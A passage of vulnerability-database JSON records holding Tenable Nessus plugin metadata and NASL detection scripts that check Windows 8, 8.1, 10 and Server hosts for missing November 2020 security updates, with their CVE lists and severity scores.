= \"MS20-11\";\nkbs = make_list('4586808', '4586834');\n\nif (get_kb_item(\"Host/patch_management_checks\")) hotfix_check_3rd_party(bulletin:bulletin, kbs:kbs, severity:SECURITY_HOLE);\n\nget_kb_item_or_exit(\"SMB/Registry/Enumerated\");\nget_kb_item_or_exit(\"SMB/WindowsVersion\", exit_code:1);\n\nif (hotfix_check_sp_range(win8:'0') <= 0) audit(AUDIT_OS_SP_NOT_VULN);\n\n# Windows 8 EOL\nproductname = get_kb_item_or_exit(\"SMB/ProductName\", exit_code:1);\nif (\"Windows 8\" >< productname) audit(AUDIT_OS_SP_NOT_VULN);\n\nshare = hotfix_get_systemdrive(as_share:TRUE, exit_on_fail:TRUE);\nif (!is_accessible_share(share:share)) audit(AUDIT_SHARE_FAIL, share);\n\nif (\n smb_check_rollup(os:\"6.2\",\n sp:0,\n rollup_date:\"11_2020\",\n bulletin:bulletin,\n rollup_kb_list:[4586808, 4586834])\n)\n{\n replace_kb_item(name:'SMB/Missing/'+bulletin, value:TRUE);\n hotfix_security_hole();\n hotfix_check_fversion_end();\n exit(0);\n}\nelse\n{\n hotfix_check_fversion_end();\n audit(AUDIT_HOST_NOT, hotfix_get_audit_report());\n}\n", "cvss": {"score": 10, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2022-06-23T15:12:32", "description": "The Windows installation on the remote host is missing security update 4586781. It is, therefore, affected by multiple vulnerabilities. Please review the vendor advisory for more details.", "cvss3": {"score": 9.8, "vector": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H"}, "published": "2020-11-10T00:00:00", "type": "nessus", "title": "KB4586823: Windows 8.1 and Windows Server 2012 R2 November 2020 Security Update", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2020-1599", "CVE-2020-16997", "CVE-2020-17000", "CVE-2020-17001", "CVE-2020-17004", "CVE-2020-17011", "CVE-2020-17014", "CVE-2020-17024", "CVE-2020-17025", "CVE-2020-17026", "CVE-2020-17027", "CVE-2020-17028", "CVE-2020-17029", "CVE-2020-17031", "CVE-2020-17032", "CVE-2020-17033", "CVE-2020-17034", "CVE-2020-17036", "CVE-2020-17038", "CVE-2020-17040", "CVE-2020-17041", "CVE-2020-17042", "CVE-2020-17043", "CVE-2020-17044", "CVE-2020-17045", "CVE-2020-17047", "CVE-2020-17049", "CVE-2020-17051", "CVE-2020-17052", "CVE-2020-17055", "CVE-2020-17056", "CVE-2020-17068", "CVE-2020-17069", "CVE-2020-17087", "CVE-2020-17088"], "modified": "2021-11-30T00:00:00", "cpe": ["cpe:/o:microsoft:windows"], "id": "SMB_NT_MS20_NOV_4586845.NASL", "href": "https://www.tenable.com/plugins/nessus/142686", "sourceData": "#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were \n# extracted from the Microsoft Security Updates API. The text\n# itself is copyright (C) Microsoft Corporation.\n#\n\ninclude('compat.inc');\n\nif (description)\n{\n script_id(142686);\n script_version(\"1.8\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2021/11/30\");\n\n script_cve_id(\n \"CVE-2020-1599\",\n \"CVE-2020-16997\",\n \"CVE-2020-17000\",\n \"CVE-2020-17001\",\n \"CVE-2020-17004\",\n \"CVE-2020-17011\",\n \"CVE-2020-17014\",\n \"CVE-2020-17024\",\n \"CVE-2020-17025\",\n \"CVE-2020-17026\",\n \"CVE-2020-17027\",\n \"CVE-2020-17028\",\n \"CVE-2020-17029\",\n \"CVE-2020-17031\",\n \"CVE-2020-17032\",\n \"CVE-2020-17033\",\n \"CVE-2020-17034\",\n \"CVE-2020-17036\",\n \"CVE-2020-17038\",\n \"CVE-2020-17040\",\n \"CVE-2020-17041\",\n \"CVE-2020-17042\",\n \"CVE-2020-17043\",\n \"CVE-2020-17044\",\n \"CVE-2020-17045\",\n \"CVE-2020-17047\",\n \"CVE-2020-17049\",\n \"CVE-2020-17051\",\n \"CVE-2020-17052\",\n \"CVE-2020-17055\",\n \"CVE-2020-17056\",\n \"CVE-2020-17068\",\n \"CVE-2020-17069\",\n \"CVE-2020-17087\",\n \"CVE-2020-17088\"\n );\n script_xref(name:\"MSKB\", value:\"4586823\");\n script_xref(name:\"MSKB\", value:\"4586845\");\n script_xref(name:\"MSFT\", value:\"MS20-4586823\");\n script_xref(name:\"MSFT\", value:\"MS20-4586845\");\n script_xref(name:\"IAVA\", value:\"2020-A-0513-S\");\n script_xref(name:\"IAVA\", value:\"2020-A-0518-S\");\n script_xref(name:\"IAVA\", value:\"2020-A-0521-S\");\n script_xref(name:\"CISA-KNOWN-EXPLOITED\", value:\"2022/05/03\");\n\n script_name(english:\"KB4586823: Windows 8.1 and Windows Server 2012 R2 November 2020 Security Update\");\n\n script_set_attribute(attribute:\"synopsis\", value:\n\"The remote Windows host is affected by multiple vulnerabilities.\");\n script_set_attribute(attribute:\"description\", value:\n\"The Windows installation on the remote host is missing security update 4586781. It is, therefore,\n affected by multiple vulnerabilities. Please review the vendor advisory for more details.\");\n script_set_attribute(attribute:\"see_also\", value:\"https://support.microsoft.com/en-us/help/4586823/windows-8-1-update\");\n script_set_attribute(attribute:\"see_also\", value:\"https://support.microsoft.com/en-us/help/4586845/windows-8-1-update\");\n script_set_attribute(attribute:\"solution\", value:\n\"Apply Security Only update KB4586823 or Cumulative Update KB4586845.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:C/I:C/A:C\");\n script_set_cvss_temporal_vector(\"CVSS2#E:H/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:H/RL:O/RC:C\");\n script_set_attribute(attribute:\"cvss_score_source\", value:\"CVE-2020-17051\");\n\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"exploited_by_malware\", value:\"true\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2020/11/10\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2020/11/10\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2020/11/10\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:microsoft:windows\");\n script_set_attribute(attribute:\"stig_severity\", value:\"I\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_family(english:\"Windows : Microsoft Bulletins\");\n\n script_copyright(english:\"This script is Copyright (C) 2020-2021 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n\n script_dependencies(\"smb_check_rollup.nasl\", \"smb_hotfixes.nasl\", \"ms_bulletin_checks_possible.nasl\");\n script_require_keys(\"SMB/MS_Bulletin_Checks/Possible\");\n script_require_ports(139, 445, \"Host/patch_management_checks\");\n\n exit(0);\n}\n\ninclude(\"audit.inc\");\ninclude(\"smb_hotfixes_fcheck.inc\");\ninclude(\"smb_hotfixes.inc\");\ninclude(\"smb_func.inc\");\ninclude(\"misc_func.inc\");\n\nget_kb_item_or_exit(\"SMB/MS_Bulletin_Checks/Possible\");\n\nbulletin = \"MS20-11\";\nkbs = make_list('4586823', '4586845');\n\nif (get_kb_item(\"Host/patch_management_checks\")) hotfix_check_3rd_party(bulletin:bulletin, kbs:kbs, severity:SECURITY_HOLE);\n\nget_kb_item_or_exit(\"SMB/Registry/Enumerated\");\nget_kb_item_or_exit(\"SMB/WindowsVersion\", exit_code:1);\n\nif (hotfix_check_sp_range(win81:'0') <= 0) audit(AUDIT_OS_SP_NOT_VULN);\n\n# Windows 8 EOL\nproductname = get_kb_item_or_exit(\"SMB/ProductName\", exit_code:1);\nif (\"Windows 8\" >< productname && \"8.1\" >!< productname)\n audit(AUDIT_OS_SP_NOT_VULN);\n\nshare = hotfix_get_systemdrive(as_share:TRUE, exit_on_fail:TRUE);\nif (!is_accessible_share(share:share)) audit(AUDIT_SHARE_FAIL, share);\n\nif (\n smb_check_rollup(os:\"6.3\",\n sp:0,\n rollup_date:\"11_2020\",\n bulletin:bulletin,\n rollup_kb_list:[4586823, 4586845])\n)\n{\n replace_kb_item(name:'SMB/Missing/'+bulletin, value:TRUE);\n hotfix_security_hole();\n hotfix_check_fversion_end();\n exit(0);\n}\nelse\n{\n hotfix_check_fversion_end();\n audit(AUDIT_HOST_NOT, hotfix_get_audit_report());\n}\n", "cvss": {"score": 10, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2022-06-23T15:13:10", "description": "The Windows installation on the remote host is missing security update 4586781. It is, therefore, affected by multiple vulnerabilities. Please review the vendor advisory for more details.", "cvss3": {"score": 9.8, "vector": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H"}, "published": "2020-11-10T00:00:00", "type": "nessus", "title": "KB4586793: Windows 10 Version 1809 and Windows Server 2019 November 2020 Security Update", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2020-1599", "CVE-2020-16997", "CVE-2020-16998", "CVE-2020-17000", "CVE-2020-17001", "CVE-2020-17004", "CVE-2020-17007", "CVE-2020-17011", "CVE-2020-17013", "CVE-2020-17014", "CVE-2020-17024", "CVE-2020-17025", "CVE-2020-17026", "CVE-2020-17027", "CVE-2020-17028", "CVE-2020-17029", "CVE-2020-17030", "CVE-2020-17031", "CVE-2020-17032", "CVE-2020-17033", "CVE-2020-17034", "CVE-2020-17035", "CVE-2020-17036", "CVE-2020-17038", "CVE-2020-17040", "CVE-2020-17041", "CVE-2020-17042", "CVE-2020-17043", "CVE-2020-17044", "CVE-2020-17045", "CVE-2020-17046", "CVE-2020-17047", "CVE-2020-17049", "CVE-2020-17051", "CVE-2020-17052", "CVE-2020-17053", "CVE-2020-17055", "CVE-2020-17056", "CVE-2020-17057", "CVE-2020-17058", "CVE-2020-17068", "CVE-2020-17069", "CVE-2020-17070", "CVE-2020-17071", "CVE-2020-17075", "CVE-2020-17077", "CVE-2020-17087", "CVE-2020-17088", "CVE-2020-17090"], "modified": "2021-11-30T00:00:00", "cpe": ["cpe:/o:microsoft:windows"], "id": "SMB_NT_MS20_NOV_4586793.NASL", "href": "https://www.tenable.com/plugins/nessus/142693", "sourceData": "#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were \n# extracted from the Microsoft Security Updates API. The text\n# itself is copyright (C) Microsoft Corporation.\n#\n\ninclude('compat.inc');\n\nif (description)\n{\n script_id(142693);\n script_version(\"1.8\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2021/11/30\");\n\n script_cve_id(\n \"CVE-2020-1599\",\n \"CVE-2020-16997\",\n \"CVE-2020-16998\",\n \"CVE-2020-17000\",\n \"CVE-2020-17001\",\n \"CVE-2020-17004\",\n \"CVE-2020-17007\",\n \"CVE-2020-17011\",\n \"CVE-2020-17013\",\n \"CVE-2020-17014\",\n \"CVE-2020-17024\",\n \"CVE-2020-17025\",\n \"CVE-2020-17026\",\n \"CVE-2020-17027\",\n \"CVE-2020-17028\",\n \"CVE-2020-17029\",\n \"CVE-2020-17030\",\n \"CVE-2020-17031\",\n \"CVE-2020-17032\",\n \"CVE-2020-17033\",\n \"CVE-2020-17034\",\n \"CVE-2020-17035\",\n \"CVE-2020-17036\",\n \"CVE-2020-17038\",\n \"CVE-2020-17040\",\n \"CVE-2020-17041\",\n \"CVE-2020-17042\",\n \"CVE-2020-17043\",\n \"CVE-2020-17044\",\n \"CVE-2020-17045\",\n \"CVE-2020-17046\",\n \"CVE-2020-17047\",\n \"CVE-2020-17049\",\n \"CVE-2020-17051\",\n \"CVE-2020-17052\",\n \"CVE-2020-17053\",\n \"CVE-2020-17055\",\n \"CVE-2020-17056\",\n \"CVE-2020-17057\",\n \"CVE-2020-17058\",\n \"CVE-2020-17068\",\n \"CVE-2020-17069\",\n \"CVE-2020-17070\",\n \"CVE-2020-17071\",\n \"CVE-2020-17075\",\n \"CVE-2020-17077\",\n \"CVE-2020-17087\",\n \"CVE-2020-17088\",\n \"CVE-2020-17090\"\n );\n script_xref(name:\"MSKB\", value:\"4586793\");\n script_xref(name:\"MSFT\", value:\"MS20-4586793\");\n script_xref(name:\"IAVA\", value:\"2020-A-0512-S\");\n script_xref(name:\"IAVA\", value:\"2020-A-0513-S\");\n script_xref(name:\"IAVA\", value:\"2020-A-0518-S\");\n script_xref(name:\"IAVA\", value:\"2020-A-0521-S\");\n script_xref(name:\"CISA-KNOWN-EXPLOITED\", value:\"2022/05/03\");\n\n script_name(english:\"KB4586793: Windows 10 Version 1809 and Windows Server 2019 November 2020 Security Update\");\n\n script_set_attribute(attribute:\"synopsis\", value:\n\"The remote Windows host is affected by multiple vulnerabilities.\");\n script_set_attribute(attribute:\"description\", value:\n\"The Windows installation on the remote host is missing security update 4586781. It is, therefore,\n affected by multiple vulnerabilities. Please review the vendor advisory for more details.\");\n # https://support.microsoft.com/en-us/help/4586793/windows-10-update-kb4586793\n script_set_attribute(attribute:\"see_also\", value:\"http://www.nessus.org/u?92d059c3\");\n script_set_attribute(attribute:\"solution\", value:\n\"Apply Cumulative Update KB4586793.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:C/I:C/A:C\");\n script_set_cvss_temporal_vector(\"CVSS2#E:H/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:H/RL:O/RC:C\");\n script_set_attribute(attribute:\"cvss_score_source\", value:\"CVE-2020-17051\");\n\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"exploited_by_malware\", value:\"true\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2020/11/10\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2020/11/10\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2020/11/10\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:microsoft:windows\");\n script_set_attribute(attribute:\"stig_severity\", value:\"I\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_family(english:\"Windows : Microsoft Bulletins\");\n\n script_copyright(english:\"This script is Copyright (C) 2020-2021 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n\n script_dependencies(\"smb_check_rollup.nasl\", \"smb_hotfixes.nasl\", \"ms_bulletin_checks_possible.nasl\");\n script_require_keys(\"SMB/MS_Bulletin_Checks/Possible\");\n script_require_ports(139, 445, \"Host/patch_management_checks\");\n\n exit(0);\n}\n\ninclude(\"audit.inc\");\ninclude(\"smb_hotfixes_fcheck.inc\");\ninclude(\"smb_hotfixes.inc\");\ninclude(\"smb_func.inc\");\ninclude(\"misc_func.inc\");\n\nget_kb_item_or_exit(\"SMB/MS_Bulletin_Checks/Possible\");\n\nbulletin = \"MS20-11\";\nkbs = make_list('4586793');\n\nif (get_kb_item(\"Host/patch_management_checks\")) hotfix_check_3rd_party(bulletin:bulletin, kbs:kbs, severity:SECURITY_HOLE);\n\nget_kb_item_or_exit(\"SMB/Registry/Enumerated\");\nget_kb_item_or_exit(\"SMB/WindowsVersion\", exit_code:1);\n\nif (hotfix_check_sp_range(win10:'0') <= 0) audit(AUDIT_OS_SP_NOT_VULN);\n\nshare = hotfix_get_systemdrive(as_share:TRUE, exit_on_fail:TRUE);\nif (!is_accessible_share(share:share)) audit(AUDIT_SHARE_FAIL, share);\n\nif (\n smb_check_rollup(os:\"10\",\n sp:0,\n os_build:\"17763\",\n rollup_date:\"11_2020\",\n bulletin:bulletin,\n rollup_kb_list:[4586793])\n)\n{\n replace_kb_item(name:'SMB/Missing/'+bulletin, value:TRUE);\n hotfix_security_hole();\n hotfix_check_fversion_end();\n exit(0);\n}\nelse\n{\n hotfix_check_fversion_end();\n audit(AUDIT_HOST_NOT, hotfix_get_audit_report());\n}\n", "cvss": {"score": 10, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2022-06-23T15:13:14", "description": "The Microsoft 4586830 Product is missing security updates.\n\n - Remote Desktop Protocol Server Information Disclosure Vulnerability (CVE-2020-16997)\n\n - DirectX Elevation of Privilege Vulnerability (CVE-2020-16998)\n\n - Windows WalletService Information Disclosure Vulnerability (CVE-2020-16999)\n\n - Remote Desktop Protocol Client Information Disclosure Vulnerability (CVE-2020-17000)\n\n - Windows Print Spooler Elevation of Privilege Vulnerability This CVE ID is unique from CVE-2020-17014.\n (CVE-2020-17001)\n\n - Windows Graphics Component Information Disclosure Vulnerability (CVE-2020-17004)\n\n - Windows Remote Access Elevation of Privilege Vulnerability This CVE ID is unique from CVE-2020-17025, CVE-2020-17026, CVE-2020-17027, CVE-2020-17028, CVE-2020-17031, CVE-2020-17032, CVE-2020-17033, CVE-2020-17034, CVE-2020-17043, CVE-2020-17044. (CVE-2020-17055)\n\n - Windows Network File System Information Disclosure Vulnerability (CVE-2020-17056)\n\n - Windows Win32k Elevation of Privilege Vulnerability (CVE-2020-17057)\n\n - Windows GDI+ Remote Code Execution Vulnerability (CVE-2020-17068)\n\n - Windows NDIS Information Disclosure Vulnerability (CVE-2020-17069)\n\n - Windows Delivery Optimization Information Disclosure Vulnerability (CVE-2020-17071)\n\n - Windows USO Core Worker Elevation of Privilege Vulnerability (CVE-2020-17075)\n\n - Windows Kernel Local Elevation of Privilege Vulnerability (CVE-2020-17087)\n\n - Windows Common Log File System Driver Elevation of Privilege Vulnerability (CVE-2020-17088)\n\n - Windows Camera Codec Information Disclosure Vulnerability (CVE-2020-17113)\n\n - Windows Spoofing Vulnerability (CVE-2020-1599)\n\n - Windows Error Reporting Elevation of Privilege Vulnerability (CVE-2020-17007)\n\n - Windows Port Class Library Elevation of Privilege Vulnerability (CVE-2020-17011)\n\n - Windows Print Spooler Elevation of Privilege Vulnerability This CVE ID is unique from CVE-2020-17001.\n (CVE-2020-17014)\n\n - Windows Client Side Rendering Print Provider Elevation of Privilege Vulnerability (CVE-2020-17024)\n\n - Windows Remote Access Elevation of Privilege Vulnerability This CVE ID is unique from CVE-2020-17026, CVE-2020-17027, CVE-2020-17028, CVE-2020-17031, CVE-2020-17032, CVE-2020-17033, CVE-2020-17034, CVE-2020-17043, CVE-2020-17044, CVE-2020-17055. (CVE-2020-17025)\n\n - Windows Remote Access Elevation of Privilege Vulnerability This CVE ID is unique from CVE-2020-17025, CVE-2020-17027, CVE-2020-17028, CVE-2020-17031, CVE-2020-17032, CVE-2020-17033, CVE-2020-17034, CVE-2020-17043, CVE-2020-17044, CVE-2020-17055. (CVE-2020-17026)\n\n - Windows Remote Access Elevation of Privilege Vulnerability This CVE ID is unique from CVE-2020-17025, CVE-2020-17026, CVE-2020-17028, CVE-2020-17031, CVE-2020-17032, CVE-2020-17033, CVE-2020-17034, CVE-2020-17043, CVE-2020-17044, CVE-2020-17055. (CVE-2020-17027)\n\n - Windows Remote Access Elevation of Privilege Vulnerability This CVE ID is unique from CVE-2020-17025, CVE-2020-17026, CVE-2020-17027, CVE-2020-17031, CVE-2020-17032, CVE-2020-17033, CVE-2020-17034, CVE-2020-17043, CVE-2020-17044, CVE-2020-17055. (CVE-2020-17028)\n\n - Windows Canonical Display Driver Information Disclosure Vulnerability (CVE-2020-17029)\n\n - Windows Remote Access Elevation of Privilege Vulnerability This CVE ID is unique from CVE-2020-17025, CVE-2020-17026, CVE-2020-17027, CVE-2020-17028, CVE-2020-17032, CVE-2020-17033, CVE-2020-17034, CVE-2020-17043, CVE-2020-17044, CVE-2020-17055. (CVE-2020-17031)\n\n - Windows Remote Access Elevation of Privilege Vulnerability This CVE ID is unique from CVE-2020-17025, CVE-2020-17026, CVE-2020-17027, CVE-2020-17028, CVE-2020-17031, CVE-2020-17033, CVE-2020-17034, CVE-2020-17043, CVE-2020-17044, CVE-2020-17055. (CVE-2020-17032)\n\n - Windows Remote Access Elevation of Privilege Vulnerability This CVE ID is unique from CVE-2020-17025, CVE-2020-17026, CVE-2020-17027, CVE-2020-17028, CVE-2020-17031, CVE-2020-17032, CVE-2020-17034, CVE-2020-17043, CVE-2020-17044, CVE-2020-17055. (CVE-2020-17033)\n\n - Windows Remote Access Elevation of Privilege Vulnerability This CVE ID is unique from CVE-2020-17025, CVE-2020-17026, CVE-2020-17027, CVE-2020-17028, CVE-2020-17031, CVE-2020-17032, CVE-2020-17033, CVE-2020-17043, CVE-2020-17044, CVE-2020-17055. (CVE-2020-17034)\n\n - Windows Kernel Elevation of Privilege Vulnerability (CVE-2020-17035)\n\n - Windows Function Discovery SSDP Provider Information Disclosure Vulnerability (CVE-2020-17036)\n\n - Windows WalletService Elevation of Privilege Vulnerability (CVE-2020-17037)\n\n - Win32k Elevation of Privilege Vulnerability This CVE ID is unique from CVE-2020-17010. (CVE-2020-17038)\n\n - Windows Hyper-V Security Feature Bypass Vulnerability (CVE-2020-17040)\n\n - Windows Print Configuration Elevation of Privilege Vulnerability (CVE-2020-17041)\n\n - Windows Print Spooler Remote Code Execution Vulnerability (CVE-2020-17042)\n\n - Windows Remote Access Elevation of Privilege Vulnerability This CVE ID is unique from CVE-2020-17025, CVE-2020-17026, CVE-2020-17027, CVE-2020-17028, CVE-2020-17031, CVE-2020-17032, CVE-2020-17033, CVE-2020-17034, CVE-2020-17044, CVE-2020-17055. (CVE-2020-17043)\n\n - Windows Remote Access Elevation of Privilege Vulnerability This CVE ID is unique from CVE-2020-17025, CVE-2020-17026, CVE-2020-17027, CVE-2020-17028, CVE-2020-17031, CVE-2020-17032, CVE-2020-17033, CVE-2020-17034, CVE-2020-17043, CVE-2020-17055. (CVE-2020-17044)\n\n - Windows KernelStream Information Disclosure Vulnerability (CVE-2020-17045)\n\n - Windows Error Reporting Denial of Service Vulnerability (CVE-2020-17046)\n\n - Windows Network File System Denial of Service Vulnerability (CVE-2020-17047)\n\n - Chakra Scripting Engine Memory Corruption Vulnerability This CVE ID is unique from CVE-2020-17054.\n (CVE-2020-17048)\n\n - Kerberos Security Feature Bypass Vulnerability (CVE-2020-17049)\n\n - Windows Network File System Remote Code Execution Vulnerability (CVE-2020-17051)\n\n - Scripting Engine Memory Corruption Vulnerability (CVE-2020-17052)\n\n - Chakra Scripting Engine Memory Corruption Vulnerability This CVE ID is unique from CVE-2020-17048.\n (CVE-2020-17054)\n\n - Microsoft Browser Memory Corruption Vulnerability (CVE-2020-17058)\n\nNote that Nessus has not tested for this issue but has instead relied only on the application's self-reported version number.", "cvss3": {"score": 9.8, "vector": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H"}, "published": "2020-11-10T00:00:00", "type": "nessus", "title": "KB4586830: Windows 10 Version 1607 and Windows Server 2016 November 2020 Security Update", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2020-1599", "CVE-2020-16997", "CVE-2020-16998", "CVE-2020-16999", "CVE-2020-17000", "CVE-2020-17001", "CVE-2020-17004", "CVE-2020-17007", "CVE-2020-17010", "CVE-2020-17011", "CVE-2020-17014", "CVE-2020-17024", "CVE-2020-17025", "CVE-2020-17026", "CVE-2020-17027", "CVE-2020-17028", "CVE-2020-17029", "CVE-2020-17031", "CVE-2020-17032", "CVE-2020-17033", "CVE-2020-17034", "CVE-2020-17035", "CVE-2020-17036", "CVE-2020-17037", "CVE-2020-17038", "CVE-2020-17040", "CVE-2020-17041", "CVE-2020-17042", "CVE-2020-17043", "CVE-2020-17044", "CVE-2020-17045", "CVE-2020-17046", "CVE-2020-17047", "CVE-2020-17048", "CVE-2020-17049", "CVE-2020-17051", "CVE-2020-17052", "CVE-2020-17054", "CVE-2020-17055", "CVE-2020-17056", "CVE-2020-17057", "CVE-2020-17058", "CVE-2020-17068", "CVE-2020-17069", "CVE-2020-17071", "CVE-2020-17075", "CVE-2020-17087", "CVE-2020-17088", "CVE-2020-17113"], "modified": "2021-11-30T00:00:00", "cpe": ["cpe:/o:microsoft:windows"], "id": "SMB_NT_MS20_NOV_4586830.NASL", "href": "https://www.tenable.com/plugins/nessus/142690", "sourceData": "#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were \n# extracted from the Microsoft Security Updates API. The text\n# itself is copyright (C) Microsoft Corporation.\n#\n\ninclude('compat.inc');\n\nif (description)\n{\n script_id(142690);\n script_version(\"1.9\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2021/11/30\");\n\n script_cve_id(\n \"CVE-2020-1599\",\n \"CVE-2020-16997\",\n \"CVE-2020-16998\",\n \"CVE-2020-16999\",\n \"CVE-2020-17000\",\n \"CVE-2020-17001\",\n \"CVE-2020-17004\",\n \"CVE-2020-17007\",\n \"CVE-2020-17011\",\n \"CVE-2020-17014\",\n \"CVE-2020-17024\",\n \"CVE-2020-17025\",\n \"CVE-2020-17026\",\n \"CVE-2020-17027\",\n \"CVE-2020-17028\",\n \"CVE-2020-17029\",\n \"CVE-2020-17031\",\n \"CVE-2020-17032\",\n \"CVE-2020-17033\",\n \"CVE-2020-17034\",\n \"CVE-2020-17035\",\n \"CVE-2020-17036\",\n \"CVE-2020-17037\",\n \"CVE-2020-17038\",\n \"CVE-2020-17040\",\n \"CVE-2020-17041\",\n \"CVE-2020-17042\",\n \"CVE-2020-17043\",\n \"CVE-2020-17044\",\n \"CVE-2020-17045\",\n \"CVE-2020-17046\",\n \"CVE-2020-17047\",\n \"CVE-2020-17048\",\n \"CVE-2020-17049\",\n \"CVE-2020-17051\",\n \"CVE-2020-17052\",\n \"CVE-2020-17054\",\n \"CVE-2020-17055\",\n \"CVE-2020-17056\",\n \"CVE-2020-17057\",\n \"CVE-2020-17058\",\n \"CVE-2020-17068\",\n \"CVE-2020-17069\",\n \"CVE-2020-17071\",\n \"CVE-2020-17075\",\n \"CVE-2020-17087\",\n \"CVE-2020-17088\",\n \"CVE-2020-17113\"\n );\n script_xref(name:\"MSKB\", value:\"4586830\");\n script_xref(name:\"MSFT\", value:\"MS20-4586830\");\n script_xref(name:\"IAVA\", value:\"2020-A-0512-S\");\n script_xref(name:\"IAVA\", value:\"2020-A-0513-S\");\n script_xref(name:\"IAVA\", value:\"2020-A-0518-S\");\n script_xref(name:\"IAVA\", value:\"2020-A-0521-S\");\n script_xref(name:\"CISA-KNOWN-EXPLOITED\", value:\"2022/05/03\");\n\n script_name(english:\"KB4586830: Windows 10 Version 1607 and Windows Server 2016 November 2020 Security Update\");\n\n script_set_attribute(attribute:\"synopsis\", value:\n\"The remote Windows host is affected by multiple vulnerabilities.\");\n script_set_attribute(attribute:\"description\", value:\n\"The Microsoft 4586830 Product is missing security updates.\n\n - Remote Desktop Protocol Server Information Disclosure Vulnerability (CVE-2020-16997)\n\n - DirectX Elevation of Privilege Vulnerability (CVE-2020-16998)\n\n - Windows WalletService Information Disclosure Vulnerability (CVE-2020-16999)\n\n - Remote Desktop Protocol Client Information Disclosure Vulnerability (CVE-2020-17000)\n\n - Windows Print Spooler Elevation of Privilege Vulnerability This CVE ID is unique from CVE-2020-17014.\n (CVE-2020-17001)\n\n - Windows Graphics Component Information Disclosure Vulnerability (CVE-2020-17004)\n\n - Windows Remote Access Elevation of Privilege Vulnerability This CVE ID is unique from CVE-2020-17025,\n CVE-2020-17026, CVE-2020-17027, CVE-2020-17028, CVE-2020-17031, CVE-2020-17032, CVE-2020-17033,\n CVE-2020-17034, CVE-2020-17043, CVE-2020-17044. (CVE-2020-17055)\n\n - Windows Network File System Information Disclosure Vulnerability (CVE-2020-17056)\n\n - Windows Win32k Elevation of Privilege Vulnerability (CVE-2020-17057)\n\n - Windows GDI+ Remote Code Execution Vulnerability (CVE-2020-17068)\n\n - Windows NDIS Information Disclosure Vulnerability (CVE-2020-17069)\n\n - Windows Delivery Optimization Information Disclosure Vulnerability (CVE-2020-17071)\n\n - Windows USO Core Worker Elevation of Privilege Vulnerability (CVE-2020-17075)\n\n - Windows Kernel Local Elevation of Privilege Vulnerability (CVE-2020-17087)\n\n - Windows Common Log File System Driver Elevation of Privilege Vulnerability (CVE-2020-17088)\n\n - Windows Camera Codec Information Disclosure Vulnerability (CVE-2020-17113)\n\n - Windows Spoofing Vulnerability (CVE-2020-1599)\n\n - Windows Error Reporting Elevation of Privilege Vulnerability (CVE-2020-17007)\n\n - Windows Port Class Library Elevation of Privilege Vulnerability (CVE-2020-17011)\n\n - Windows Print Spooler Elevation of Privilege Vulnerability This CVE ID is unique from CVE-2020-17001.\n (CVE-2020-17014)\n\n - Windows Client Side Rendering Print Provider Elevation of Privilege Vulnerability (CVE-2020-17024)\n\n - Windows Remote Access Elevation of Privilege Vulnerability This CVE ID is unique from CVE-2020-17026,\n CVE-2020-17027, CVE-2020-17028, CVE-2020-17031, CVE-2020-17032, CVE-2020-17033, CVE-2020-17034,\n CVE-2020-17043, CVE-2020-17044, CVE-2020-17055. (CVE-2020-17025)\n\n - Windows Remote Access Elevation of Privilege Vulnerability This CVE ID is unique from CVE-2020-17025,\n CVE-2020-17027, CVE-2020-17028, CVE-2020-17031, CVE-2020-17032, CVE-2020-17033, CVE-2020-17034,\n CVE-2020-17043, CVE-2020-17044, CVE-2020-17055. (CVE-2020-17026)\n\n - Windows Remote Access Elevation of Privilege Vulnerability This CVE ID is unique from CVE-2020-17025,\n CVE-2020-17026, CVE-2020-17028, CVE-2020-17031, CVE-2020-17032, CVE-2020-17033, CVE-2020-17034,\n CVE-2020-17043, CVE-2020-17044, CVE-2020-17055. 